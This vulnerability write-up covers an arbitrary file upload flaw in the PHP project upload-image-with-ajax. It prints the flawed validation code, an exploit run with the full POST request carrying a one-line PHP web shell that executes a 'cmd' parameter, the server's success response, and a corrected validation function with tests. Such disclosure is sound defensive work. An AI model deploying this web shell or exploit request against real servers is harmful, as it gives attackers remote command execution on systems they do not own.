Title: Arbitrary file upload vulnerability in upload-image-with-ajax
The code below sets the $ready flag to true whenever the file is smaller than 1000000 bytes, which overrides the result of the earlier check that the file is an image. As a result, a .php file can be uploaded with only a warning, allowing code execution.

$ready = false;
if((($imageType == "image/jpeg") || ($imageType == "image/jpg") || ($imageType == "image/png")) && in_array($fileExt, $validext)){
    $ready = true;
}else{
    echo "was not an image<br>";
    // You should abort the upload right here
}
// The size check sets $ready again, overriding a failed image check above.
if($_FILES["fileUpload"]["size"] < 1000000){
    $ready = true;
    echo "file size is ".$_FILES['fileUpload']["size"]."<br>";
}else{
    echo "file was TOO BIG!";
}

$ ./fileupload_exploit 192.168.0.3 80 /upload-image-with-ajax/upload.php  fileUpload


POST request size is 482 bytes

Sending Payload:
POST /upload-image-with-ajax/upload.php HTTP/1.1
Host: 192.168.0.3
User-Agent: File Upload Exploiter/v1.2
Accept: */*
Content-Length: 251
Content-Type: multipart/form-data; boundary=------------------------c8e05c8871143853

--------------------------c8e05c8871143853
Content-Disposition: form-data; name="fileUpload"; filename="shell.php"
Content-Type: application/octet-stream

<?php $cmd=$_GET['cmd']; system($cmd);?>

--------------------------c8e05c8871143853--

HTTP/1.1 200 OK
Date: Tue, 24 Dec 2019 12:16:57 GMT
Server: Apache/2.4.25 (Debian)
Vary: Accept-Encoding
Content-Length: 96
Content-Type: text/html; charset=UTF-8

was not an image<br><h2> application/octet-stream</h2>file size is 42<br>upload successful!
[+] Total bytes read: 267
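
The check with the flaw removed, as an added example that is not code from the upload-image-with-ajax project: every test must pass before a file is accepted, the type is read from the file content instead of the client-supplied Content-Type, and the stored name is generated by the server. The function name validateUpload, the constructed sample files and the availability of PHP's fileinfo extension are assumptions of this example.

```php
<?php
// Added example, not the project's code. validateUpload() and the sample
// files are assumptions; requires PHP's fileinfo extension.
function validateUpload(array $file, int $maxBytes = 1000000): ?string
{
    // Accepted extensions and the content type each one must carry.
    $allowed = ['jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg', 'png' => 'image/png'];

    // Every check returns on failure, so no later check can re-approve the file.
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return null;
    }
    if ($file['size'] <= 0 || $file['size'] >= $maxBytes) {
        return null;
    }
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!isset($allowed[$ext])) {
        return null;
    }
    // Read the type from the bytes on disk; $_FILES[...]['type'] is client-supplied.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($mime !== $allowed[$ext]) {
        return null;
    }
    // Server-generated name; store it with move_uploaded_file() in a real handler.
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Constructed sample files so the block runs from the CLI without a web server.
$png = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($png, "\x89PNG\r\n\x1a\n\x00\x00\x00\x0dIHDR"
    . "\x00\x00\x00\x01\x00\x00\x00\x01\x08\x06\x00\x00\x00");
$txt = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($txt, "<?php echo 'constructed sample'; ?>");

$cases = [
    'photo.png' => $png,   // PNG header with an allowed extension
    'shell.php' => $txt,   // script extension
    'shell.png' => $txt,   // script content behind an image extension
];
foreach ($cases as $name => $path) {
    $file = ['name' => $name, 'tmp_name' => $path,
             'size' => filesize($path), 'error' => UPLOAD_ERR_OK];
    echo $name, ' => ', validateUpload($file) === null ? 'rejected' : 'accepted', "\n";
}
unlink($png);
unlink($txt);
```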